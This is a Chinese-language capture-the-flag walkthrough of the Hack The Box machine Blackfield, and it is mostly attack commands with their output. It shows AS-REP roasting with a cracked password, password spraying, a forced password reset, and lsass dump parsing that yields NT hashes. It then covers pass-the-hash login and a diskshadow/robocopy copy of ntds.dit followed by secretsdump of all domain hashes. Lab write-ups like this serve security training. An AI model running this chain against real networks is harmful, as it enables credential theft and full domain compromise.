![](../Images/htb_blackfield_pwned.png)

靶机信息
状态退役
难度Hard
IP/
地址https://app.hackthebox.com/machines/Blackfield
价格需要订阅 14$ /20 $ /月

端口扫描

└──╼ #nmap -p- --min-rate=1000 -T4 10.129.229.17
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-14 14:14 GMT
Nmap scan report for 10.129.229.17
Host is up (0.30s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
389/tcp  open  ldap
445/tcp  open  microsoft-ds
593/tcp  open  http-rpc-epmap
3268/tcp open  globalcatLDAP
5985/tcp open  wsman

端口测试

SMB_匿名登陆

└─\ ✨ smbclient -N -L \\10.129.229.17                                                                                                
        Sharename       Type      Comment                                              
        ---------       ----      -------                                              
        ADMIN$          Disk      Remote Admin                                         
        C$              Disk      Default share                                        
        forensic        Disk      Forensic / Audit share.                              
        IPC$            IPC       Remote IPC                                           
        NETLOGON        Disk      Logon server share                                   
        profiles$       Disk                                                           
        SYSVOL          Disk      Logon server share 
└─\ ✨ smbmap -u guest -p '' -H 10.129.229.17
[+] IP: 10.129.229.17:445       Name: 10.129.229.17             Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        forensic                                                NO ACCESS       Forensic / Audit share.
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share
        profiles$                                               READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share

重点查看profiles$,获得所有可能存在的用户名

└─**\ ✨** smbclient -N \\\\10.129.229.17\\profiles$ -c 'ls' | grep -v '\.' | awk -F ' ' '{print $1}' > all_users.txt

LDAP_389

扫描出域名

nmap --script="ldap*" 10.129.229.17
或者使用windapsearch
python3 /opt/windapsearch/windapsearch.py --dc-ip 10.129.229.17 -u guest -p ''
python3 /opt/windapsearch/windapsearch.py --dc-ip 10.129.229.17 -u '' -p ''

获得域名为blackfield.local

88_kerberos-sec

枚举目标域中的用户账户

└─\ ✨ kerbrute userenum -d blackfield.local --dc 10.129.229.17 all_user.txt                                                 
2024/03/17 21:01:17 >  Using KDC(s):                                                                                                                     
2024/03/17 21:01:17 >   10.129.229.17:88                                                                                                                                                                                                                                                                         
2024/03/17 21:01:42 >  [+] VALID USERNAME:       audit2020@blackfield.local                                                                              
2024/03/17 21:04:04 >  [+] VALID USERNAME:       svc_backup@blackfield.local                                                                             
2024/03/17 21:04:04 >  [+] VALID USERNAME:       support@blackfield.local   

获得三个用户,存为names.txt

audit2020
svc_backup
support

查看是否存在Do not require Kerberos preauthentication的用户

GetNPUsers.py -no-pass -usersfile names.txt blackfield.local/ -dc-ip 10.129.229.17
Impacket v0.12.0.dev1+20240208.120203.63438ae7 - Copyright 2023 Fortra

[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:21d7bf606b28356c2f5752983263025e$df6cd8800906d957156c6fa47754b611cc00013ec32b482ad47d9aa98c507513dff10e1c60d72aecc1001e16eb1bb225582f214e069a107c07c57dc3ab79ebbf8437d138247a7b2b4087a646de47a7ad5658b5a45a2810dcbe701804254a9df4bcfd0e58afd8b227550151164a965e9ba2a9760defc243a74e50aaed9e1818f2e8d9ad032343bae16c270e1952c12b37834fca851143c2f91e4982eaf0d8263858a7431d6c823cf160260a93245a98af162d4afb50fe4f7aa4d189806d54242539520391d6d546f1618f7af141579a1ddf5f8b305d3cc3a652a002a14fa067a686e1ee00dea5862ee40ad56e812b3a919dc73562

使用hashcat破解krb5asrep,模式为18200
获得一对凭据support:#00^BlackKnight

获取密码策略

└─# crackmapexec smb 10.129.229.17 -u support -p '#00^BlackKnight' --pass-pol                                                                                             
SMB         10.129.229.17   445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)                   
SMB         10.129.229.17   445    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight                                                                          
SMB         10.129.229.17   445    DC01             [+] Dumping password info for domain: BLACKFIELD                                                                      
SMB         10.129.229.17   445    DC01             Minimum password length: 7                                                                                            
SMB         10.129.229.17   445    DC01             Password history length: 24                                                                                           
SMB         10.129.229.17   445    DC01             Maximum password age: 41 days 23 hours 53 minutes                                                                     
SMB         10.129.229.17   445    DC01                                                                                                                                   
SMB         10.129.229.17   445    DC01             Password Complexity Flags: 000001                                                                                     
SMB         10.129.229.17   445    DC01                 Domain Refuse Password Change: 0                                                                                  
SMB         10.129.229.17   445    DC01                 Domain Password Store Cleartext: 0                                                                                
SMB         10.129.229.17   445    DC01                 Domain Password Lockout Admins: 0                                                                                 
SMB         10.129.229.17   445    DC01                 Domain Password No Clear Change: 0                                                                                
SMB         10.129.229.17   445    DC01                 Domain Password No Anon Change: 0                                                                                 
SMB         10.129.229.17   445    DC01                 Domain Password Complex: 1                                                                                        
SMB         10.129.229.17   445    DC01                                                                                                                                   
SMB         10.129.229.17   445    DC01             Minimum password age: 1 day 4 minutes                                                                                 
SMB         10.129.229.17   445    DC01             Reset Account Lockout Counter: 30 minutes                                                                             
SMB         10.129.229.17   445    DC01             Locked Account Duration: 30 minutes                                                                                   
SMB         10.129.229.17   445    DC01             Account Lockout Threshold: None                                                                                       
SMB         10.129.229.17   445    DC01             Forced Log off Time: Not Set 

密码喷洒

将密码存到文件password.txt中,使用crackmapexec进行密码喷洒

crackmapexec smb IP -u names.txt -p password.txt --continue-on-success

确实目前只能获得一对凭据support:#00^BlackKnight
winrm失败

提权

横向移动

BloodHound-Python

对域环境进行评估和分析

bloodhound-python -c All -d blackfield.local -u support -p '#00^BlackKnight' -ns 10.129.229.17 --zip

启动neo4j,启动BloodHound,导入扫描的结果
2024-03-18T05:49:27.png
support用户可以强制修改audit2020密码

net rpc password "audit2020" "St4rry2024" -U blackfield.local/support%"#00^BlackKnight" -S 10.129.229.17

将密码加入到password.txt还可以进行密码喷洒
audit2020用户可以访问smb的forensic目录
挂载到攻击机

└─**\ ✨** mount -t cifs -o username=audit2020,password=St4rry2024 //10.129.229.17/forensic /mnt/forensic/

memory_analysis目录下获得lsass.dmp的内存转储数据,可以使用pypykatz进行分析

$ pypykatz lsa minidump lsass.DMP
 == MSV ==
                Username: svc_backup
                Domain: BLACKFIELD
                LM: NA
                NT: 9658d1d1dcd9250115e2205d9f48400d
                SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
                DPAPI: a03cd8e9d30171f3cfe8caad92fef621
  == MSV ==
                Username: Administrator
                Domain: BLACKFIELD
                LM: NA
                NT: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
                SHA1: db5c89a961644f0978b4b69a4d2a2239d7886368
                DPAPI: 240339f898b6ac4ce3f34702e4a89550

使用9658d1d1dcd9250115e2205d9f48400d可以登陆到svc_backup的winrm

evil-winrm -i IP -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
> whoami /priv
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled

纵向移动

提权参考Windows和域控制器Backup Operatorst利用的不同之处
创建文件svc_backup.dsh

set context persistent nowriters
add volume c: alias svc_backup
create
expose %svc_backup% z:

上传到目标靶机

cd C:\Temp
upload svc_backup.dsh
diskshadow /s svc_backup.dsh
robocopy /b z:\windows\ntds . ntds.dit

备份reg save hklm\system c:\Temp\system,然后download
最后secretsdump.py -ntds ntds.dit -system system.bak local

Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:f60b9b99c0ab58be3ba963f1efe29c5f:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
svc_backup:1413:aad3b435b51404eeaad3b435b51404ee:9658d1d1dcd9250115e2205d9f48400d:::
Last modification:April 10, 2024
请我喝瓶冰阔落吧